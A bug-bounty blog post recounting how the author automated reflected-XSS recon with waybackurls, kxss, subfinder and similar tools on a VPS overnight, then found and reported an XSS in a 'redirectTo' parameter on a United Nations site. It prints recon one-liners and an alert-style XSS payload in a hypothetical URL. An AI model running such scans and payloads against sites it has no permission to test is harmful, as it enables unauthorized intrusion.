How I made it into the United Nations hall of fame as I slept

May 25, 2022


This article is about how my name ended up in the United Nations Hall of Fame for a reflected XSS bug I found while I was asleep.

If you are a beginner in bug hunting, you have probably read a ton of articles on understanding and finding XSS bugs. Me too!

The classic methodology to find them is…

  1. collect all the URLs with ‘waybackurls’ or ‘gau’
  2. select all the links that take parameters (contain an ‘=’)
  3. pipe those links to ‘kxss’ and keep the ones that reflect characters like <, >, ”, ’ unfiltered
  4. target those links and try to inject code into those parameters

Combining these steps into a one-liner (‘qsreplace’ here normalises the query values into unique links for kxss, saving time). Note that waybackurls reads the target domain on stdin:

echo target.com | waybackurls | grep = | qsreplace test | kxss

But the full methodology is a little longer (collecting all the alive domains, taking screenshots, etc.).

Recon tasks like this are long and boring, and I always spent the first half-hour of hunting, when my concentration is at its peak, running such repetitive scans. Worse, long scans were often interrupted by network drops or a dying battery.

Setting up a Virtual Private Server

The solutions to these problems were quite easy. To solve the second problem, I used a VPS from DigitalOcean: I set up a Linux server, installed the necessary tools, and ran the commands inside a ‘tmux’ pane so that my sessions survived even after I logged out.
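The tmux part of that workflow is simple. A minimal sketch (the session name ‘recon’ and the echoed command are placeholders for the real scan):

```shell
# Minimal tmux workflow on the VPS (a sketch; the session name is arbitrary).
tmux new-session -d -s recon                      # start a detached session
tmux send-keys -t recon 'echo scan started' C-m   # launch the long scan inside it
# Log out whenever you like; the session keeps running. Later, reattach with:
#   tmux attach -t recon
tmux ls 2>/dev/null || true                       # confirm the session is alive
```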

Weaponising Waybackurls

As I ran waybackurls on the target, I noticed something very weird about the tool.

Case 1: If I run waybackurls on the apex domain, I get Web Archive links for that domain and all of its subdomains.

>> waybackurls

In the example above I get only 2 results for ‘’, but in case 2…

Case 2: Running ‘waybackurls’ only on ‘’

>> waybackurls

I realised that I get more results for a given subdomain if I feed it to the tool separately. That meant that to maximise my attack surface, I had to run waybackurls on every subdomain individually. I don't have the patience to do that by hand, so I decided to write a script for it.

5-minute code to get the links from all domains (try threading to speed up the process)
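The author's actual script isn't shown, but the idea can be sketched in a few lines of shell. File names and the parallelism level here are my own choices; ‘xargs -P’ stands in for the threading the caption suggests:

```shell
# Sketch: run waybackurls against every subdomain individually, since it
# returns more results per host than one run over the apex domain.
# subdomains.txt is a placeholder list; in practice it comes from recon tools.
printf 'a.example.com\nb.example.com\n' > subdomains.txt

# Fan out: one waybackurls run per subdomain, 10 in parallel, de-duplicated.
xargs -P 10 -I{} sh -c 'echo "$1" | waybackurls' _ {} < subdomains.txt \
  | sort -u > all_wayback_urls.txt
```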

I added this code alongside code that collects subdomains from tools like ‘subfinder’, ‘amass’ and ‘findomain’, then extracts all the alive hosts and feeds that list to ‘recursive_wayback()’. Once the URL list was built, I piped it to ‘kxss’. With the list of all the URLs and their unfiltered characters in hand, I was free to look for points vulnerable to reflected XSS.
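The whole overnight pipeline can be sketched end to end. Tool names come from the article, but the flags, file names, and the ‘httpx’ probing step are my assumptions, not the author's exact script:

```shell
# End-to-end sketch of the overnight scan (flags and file names assumed).
subfinder -d example.com -silent | sort -u > subs.txt   # enumerate subdomains
httpx -l subs.txt -silent > alive.txt                   # keep hosts that respond
xargs -P 10 -I{} sh -c 'echo "$1" | waybackurls' _ {} < alive.txt \
  | grep '=' | qsreplace test | kxss > report.txt       # reflectable parameters
wc -l < report.txt                                      # size of the morning report
```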

Finding XSS

I started the scan before I went to sleep. When I woke up  ̶8̶ 6 hours later, the report was ready.

Simple grep to instantly find vulnerable parameters
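The grep itself is trivial. The exact kxss output format varies between versions, so the sample lines below are assumed; the point is just to keep findings where an angle bracket is reflected unfiltered:

```shell
# Sample kxss-style report lines (format assumed; real output may differ):
printf 'URL: http://a/?q=test Param: q Unfiltered: [< > "]\nURL: http://b/?s=test Param: s Unfiltered: []\n' > report.txt

# Keep only findings where '<' survives unfiltered, the strongest signal
# for reflected XSS.
grep '<' report.txt
```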

Once I found that the ‘redirectTo’ parameter doesn't filter <, >, ” or ’, I knew I could trigger an XSS vulnerability.
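The real endpoint isn't disclosed, but a classic proof of concept against such a parameter looks like this (the URL is hypothetical):

```shell
# Hypothetical target URL; the real endpoint is not disclosed in the article.
# If <, >, " and ' are reflected unencoded, this breaks out of the attribute
# context and injects a script tag.
payload='"><script>alert(document.domain)</script>'
url="https://example.com/login?redirectTo=${payload}"
echo "$url"
```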


Reported: 16th April 2022

Fixed: 21st April 2022

Acknowledged: 25th April 2022



If you enjoyed the blog, feel free to clap and follow me on Twitter.

Thank you.